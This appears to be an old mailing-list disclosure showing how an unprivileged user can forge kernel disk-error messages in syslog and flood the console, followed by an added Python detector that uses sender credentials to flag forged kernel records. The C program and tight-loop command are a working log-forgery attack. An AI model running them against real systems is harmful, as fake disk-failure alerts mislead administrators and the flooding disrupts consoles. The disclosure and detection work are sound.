Any unprivileged user can abuse the syslog facility in an interesting
way. The following example is a good one that can put misleading
information in the logs.
-------------------------------
#include <syslog.h>

int main(void)
{
    /* Strings formatted like kernel disk-error messages. */
    const char *mesg1 = "hda: read_intr: status=0x59 { SeekComplete "
                        "DataRequest Error } { UncorrectableError }, "
                        "CHS=157/2/9, sector=2826";
    const char *mesg2 = "end_request: I/O error, dev 03:00, sector 2826";
    const char *mesg3 = "EXT2-fs: group descriptors corrupted !";

    /* Ident "kernel" and facility LOG_KERN are chosen by the caller. */
    openlog("kernel", LOG_CONS, LOG_KERN);
    /* Pass the text as an argument, never as the format string. */
    syslog(LOG_ERR, "%s", mesg1);
    syslog(LOG_ERR, "%s", mesg2);
    syslog(LOG_ERR, "%s", mesg3);
    closelog();
    return 0;
}
---------------------------------
If one does "chmod o-rw /dev/log" that stops the above message from ending
up in the log. However, if the user runs the above in a tight loop,
i.e. "while true; do fake_message; done", then syslogd apparently can't
keep up and by definition of LOG_CONS (man 3 syslog) one has:

    LOG_CONS
        write directly to system console if there is an
        error while sending to system logger

and hence the console gets *flooded* with fake messages. This was with
RH v4.1 but I suspect general applicability.

Not a deadly security threat, but I thought I'd mention it.
Paul.
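
A logger-side check for the forgery described above, as an added example that is not part of the original post: on Linux a logger can set SO_PASSCRED on its datagram socket so the kernel attaches the sender's pid and uid to every record, which the text of the record cannot fake. The socketpair standing in for /dev/log, the sample records, the function names and the rule that only uid 0 may speak for the kernel are assumptions made for the illustration.

```python
import re
import socket
import struct

# "<PRI>Mmm dd hh:mm:ss tag..." as syslog(3) writes it to the local log socket
RECORD = re.compile(rb"^(?:<(\d{1,3})>)?(?:[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d )?(.*)$", re.S)
UCRED = struct.Struct("iII")  # Linux struct ucred: pid, uid, gid


def claims_kernel(record: bytes) -> bool:
    """True if the record poses as the kernel: facility 0 or a 'kernel' tag."""
    pri, rest = RECORD.match(record).groups()
    facility = int(pri) >> 3 if pri is not None else None
    return facility == 0 or re.match(rb"kernel[:\[]", rest) is not None


def is_forged(record: bytes, sender_uid, trusted_uids=(0,)) -> bool:
    """Forged = poses as the kernel but was not sent by a trusted uid (assumed: root)."""
    return claims_kernel(record) and sender_uid not in trusted_uids


def recv_with_creds(sock: socket.socket):
    """Read one datagram; return (record, pid, uid) using kernel-supplied credentials."""
    data, ancdata, _flags, _addr = sock.recvmsg(2048, socket.CMSG_SPACE(UCRED.size))
    for level, ctype, cdata in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_CREDENTIALS:
            pid, uid, _gid = UCRED.unpack(cdata[:UCRED.size])
            return data, pid, uid
    return data, None, None


def demo():
    # A socketpair stands in for /dev/log; both records are constructed samples.
    logger, client = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
    logger.setsockopt(socket.SOL_SOCKET, socket.SO_PASSCRED, 1)
    results = []
    for rec in (b"<11>Jan  1 00:00:00 kernel: end_request: I/O error, dev 03:00",
                b"<30>Jan  1 00:00:01 cron[412]: (root) CMD (run-parts)"):
        client.send(rec)
        record, pid, uid = recv_with_creds(logger)
        results.append((pid, uid, is_forged(record, uid)))
    logger.close()
    client.close()
    return results


if __name__ == "__main__":
    print(demo())
```

With the sender's uid in hand, a logger could also count records per uid and throttle a sender that runs in a tight loop.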